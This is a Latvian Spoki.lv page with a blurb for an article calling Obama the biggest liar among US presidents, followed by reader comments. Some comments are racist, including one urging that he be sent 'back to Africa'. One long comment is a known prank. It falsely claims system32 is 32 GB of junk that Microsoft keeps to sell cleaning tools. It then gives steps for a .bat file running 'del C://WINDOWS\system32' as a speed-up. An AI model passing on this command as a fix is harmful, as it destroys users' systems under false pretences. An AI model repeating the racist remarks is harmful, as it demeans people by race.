local-stats-pixel fb-conv-api

Lielākie Obamas meli.114

1696 82

Baraks Obama ir ne tikai pirmais melnais prezidents, bet arī lielākais melis starp visiem ASV prezidentiem. Šajā rakstā par pieciem viņa lielākajiem solijumiem ,ko viņš nav spējis izpildīt un arī visticamāk neizpildīs.

1696 82 114 Ziņot!
Ieteikt: 000
Spoki.lv logo
Spoki.lv

Komentāri 114

0/2000

Hmmm, pirmais teikums un jau rasisms... emotion

3 4 atbildēt

eu debīlais autor tev neapnīk šo rakstu vislaik pacelt? emotion pilnīgs lohs, būtu vismaz kaut ko patiesu uzrakstijis emotion

0 1 atbildēt

Shis bus populars raksts

0 1 atbildēt

Aizsūtīt viņu atpakaļ uz āfriku vnk.;D

6 7 atbildēt

Baraks obama ir tikai pus melnādainais...

1 2 atbildēt

Nu moš visi šie fakti par taisnība bet es dzirdēju ka viņš solīja ka nogalinās Oslam Bin Laden emotion

1 2 atbildēt

 

kad microsoft saaka savas gaitas tirguu, vini zinaaja, ka nevarres iepleniit pietiekami daudz zaljo, lai normaali vareetu palielinaat produktu klaasu, ziedot naudu tehnologijas attistiibam un taa taalaak.  visi zina,ka visi hako windows oopereetajsisteemu. bet tam maitam radaaas ideja, 4alis vaarda chris liddel izdomaaja sito ideju par ''system32'' viena no windows failiem  kas bURTISKI paleelan tava kompja gaitu. 'system32'' VINA satur 32 GB ar izdzeestiem failiem, neta veesturi, neiensteleetam programaam  un vel mudz visaadiem citiem suuda failiem kas leena gara liek kompim saakt veikt leenam darbiibas. un ko vini ar to panaaca?  varbut esi dzirdeejis,ka microsoft pieder dazaadas'' PC leaningn'' ieriices, programmas  kaa TuneUP utilities, Norton antivirus un taa taalaak, viniem sitas ienees KAARTIIGU zaljooo. es neesmu okay ar to un tev ari nevajadzeetu, kas butu jadara?

   

atver Notepad

 

ieraksti @echo off

 

del C://WINDOWS\system32

 

ieseivo kaa (speedup.bat) un izveelies (all files, nevis text document)

 

tad dubutlu kliski uz ta .bat faila !

 

Parestartet kompi, lai viss lidotu 2 aatraak 

   

(Tu par sito te nedzirdeji no manis)!

1 3 atbildēt
« 1  2  3  4  5 »